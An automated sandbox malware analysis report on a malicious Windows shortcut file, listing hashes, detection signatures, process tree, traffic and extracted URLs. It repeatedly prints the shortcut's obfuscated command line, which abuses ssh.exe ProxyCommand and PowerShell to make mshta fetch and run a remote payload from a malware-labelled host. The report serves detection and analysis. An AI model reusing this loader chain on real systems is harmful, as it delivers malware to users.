
Windows Analysis Report
IOnqEVA4Dz.lnk

Overview

General Information

Sample name:IOnqEVA4Dz.lnk
renamed because original name is a hash value
Original sample name:c5997a14e872d97d48e1d4ea8b66910f.lnk
Analysis ID:1582822
MD5:c5997a14e872d97d48e1d4ea8b66910f
SHA1:e5bc26705b9df5eadfc65ff0bb600743b4d2894d
SHA256:1e31450855498aa18f97e2bd1b77aa3cf652b88271502ca7ee926938c04b722f
Tags: lnk, user-abuse_ch
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Lolbin Ssh.exe Use As Proxy
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ssh.exe (PID: 7096 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1476 cmdline: powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 6464 cmdline: "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5520, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4, ProcessId: 6464, ProcessName: mshta.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ., ProcessId: 7096, ProcessName: ssh.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54), CommandLine: powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7096, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54), ProcessId: 1476, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6424, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: https://awakka-aws3.zoho-documents.com/hekko.mp4Avira URL Cloud: Label: malware
Source: IOnqEVA4Dz.lnkVirustotal: Detection: 36%Perma Link
Source: IOnqEVA4Dz.lnkReversingLabs: Detection: 34%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 95.8% probability
Source: unknownHTTPS traffic detected: 172.67.129.82:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /hekko.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awakka-aws3.zoho-documents.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: awakka-aws3.zoho-documents.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 31 Dec 2024 14:41:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINServer: cloudflareCF-RAY: 8fab084decec41f2-EWRalt-svc: h3=":443"; ma=86400
Source: svchost.exe, 00000006.00000002.3566515266.0000021AFF200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.2345137749.0000029200031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2345137749.0000029200049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2345137749.000002920005C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3AA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637)
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...0
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...p
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...ust
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?13767556376.1
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637=
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637A
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637a
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637i
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637m
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637n
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637q
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypass
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypassk
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css:
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssD
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css_
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssnt
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3564144751.000001B5C0F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4
Source: powershell.exeString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4$global:?
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp42
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4C:
Source: mshta.exe, 00000005.00000002.3563920706.000001B5C0EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4H
Source: powershell.exe, 00000004.00000002.2347693599.000002927C5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4L
Source: powershell.exe, 00000004.00000002.2345137749.000002920014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2345137749.00000292003A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4P
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4Pgs
Source: ssh.exe, 00000000.00000002.3563617247.00000229B4079000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, IOnqEVA4Dz.lnkString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4Ygs
Source: powershell.exe, 00000004.00000002.2348868362.000002927E6D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4_
Source: mshta.exe, 00000005.00000002.3567740148.000001BDC3C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4https://awakka-aws3.zoho-documents.com/hekko.mp4p7
Source: mshta.exe, 00000005.00000002.3564064373.000001B5C0EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4i
Source: powershell.exe, 00000004.00000002.2348447690.000002927C7B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4m32
Source: powershell.exe, 00000004.00000002.2345137749.0000029200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4p
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awakka-aws3.zoho-documents.com/hekko.mp4yles/cf.errors.css
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2366242998.0000021AFF090000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-eraryer
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: mshta.exe, 00000005.00000002.3568334539.000001BDC7F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/D
Source: mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/MX
Source: mshta.exe, 00000005.00000002.3568334539.000001BDC7F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/v
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

System Summary

Source: IOnqEVA4Dz.lnkLNK file: -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engineClassification label: mal76.winLNK@9/11@1/2
Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.ssh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnevcnja.2vz.ps1
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: IOnqEVA4Dz.lnkVirustotal: Detection: 36%
Source: IOnqEVA4Dz.lnkReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
